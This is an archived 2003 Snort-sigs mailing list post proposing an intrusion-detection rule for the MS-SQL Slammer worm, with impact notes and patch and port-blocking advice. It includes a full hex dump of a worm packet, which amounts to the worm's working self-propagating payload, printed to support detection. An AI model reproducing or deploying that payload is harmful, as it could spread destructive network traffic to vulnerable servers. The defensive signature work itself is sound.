[Snort-sigs] Slammer worm rule

Marcus Wu mwu at ...5...
Mon Jan 27 12:38:15 EST 2003


# This is a template for submitting snort signature descriptions to
# the snort.org website
#
# Ensure that your descriptions are your own
# and not the work of others.  References in the rules themselves
# should be used for linking to other's work. 
#
# If you are unsure of some part of a rule, use that as a commentary
# and someone else perhaps will be able to fix it.
# 
# $Id$
#
# 

Rule:  
alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Slammer Worm 
Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown; 
sid:9998; rev:1;)
--
Sid:

--
Summary:
Detect propagation of the ms-sql resolver worm - Slammer.
--
Impact:
The Slammer worm spreads quickly and can quickly generate enough traffic to 
bring down whole networks.
--
Detailed Information:
The content of the buffer overflow is what is being detected in the content.  
The hex code 0x04 is the first byte of the packets sent to propagate the 
worm.  This code is followed by a string of 0x01 bytes and finally, the 
payload of the worm code itself follows.  A hex dump of one such UDP packet 
follows:

0x0000   4500 0194 3a4a 0000 7011 ec5e XXXX XXXX        E...:J..p.......
0x0010   XXXX XXXX 12b0 059a 0180 ffea 0401 0101        ................
0x0020   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0030   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0040   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0050   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0060   0101 0101 0101 0101 0101 0101 0101 0101        ................
0x0070   0101 0101 0101 0101 0101 0101 01dc c9b0        ................
0x0080   42eb 0e01 0101 0101 0101 70ae 4201 70ae        B.........p.B.p.
0x0090   4290 9090 9090 9090 9068 dcc9 b042 b801        B........h...B..
0x00a0   0101 0131 c9b1 1850 e2fd 3501 0101 0550        ...1...P..5....P
0x00b0   89e5 5168 2e64 6c6c 6865 6c33 3268 6b65        ..Qh.dllhel32hke
0x00c0   726e 5168 6f75 6e74 6869 636b 4368 4765        rnQhounthickChGe
0x00d0   7454 66b9 6c6c 5168 3332 2e64 6877 7332        tTf.llQh32.dhws2
0x00e0   5f66 b965 7451 6873 6f63 6b66 b974 6f51        _f.etQhsockf.toQ
0x00f0   6873 656e 64be 1810 ae42 8d45 d450 ff16        hsend....B.E.P..
0x0100   508d 45e0 508d 45f0 50ff 1650 be10 10ae        P.E.P.E.P..P....
0x0110   428b 1e8b 033d 558b ec51 7405 be1c 10ae        B....=U..Qt.....
0x0120   42ff 16ff d031 c951 5150 81f1 0301 049b        B....1.QQP......
0x0130   81f1 0101 0101 518d 45cc 508b 45c0 50ff        ......Q.E.P.E.P.
0x0140   166a 116a 026a 02ff d050 8d45 c450 8b45        .j.j.j...P.E.P.E
0x0150   c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45        .P........<a...E
0x0160   b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829        ... at ...1226...)
0x0170   c28d 0490 01d8 8945 b46a 108d 45b0 5031        .......E.j..E.P1
0x0180   c951 6681 f178 0151 8d45 0350 8b45 ac50        .Qf..x.Q.E.P.E.P
0x0190   ffd6 ebca                                      ....

--
Attack Scenarios:
Unpatched ms-sql server running with access from the internet unblocked
--
Ease of Attack:
This worm's attack is automated and broad.  A vulnerable host will be infected 
as soon as it is sent the worm code.
--
False Positives:
None to knowledge
--
False Negatives:
None to knowledge
--
Corrective Action:
Patch any ms-sql servers and/or block udp port 1434.
--
Contributors:
Marcus Wu
Corey 
Steven Drew
LURHQ Corporation
-- 
Additional References:
This references the actual buffer overflow vulnerablilty.
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-039.asp
This references the worm itself.
http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21824





More information about the Snort-sigs mailing list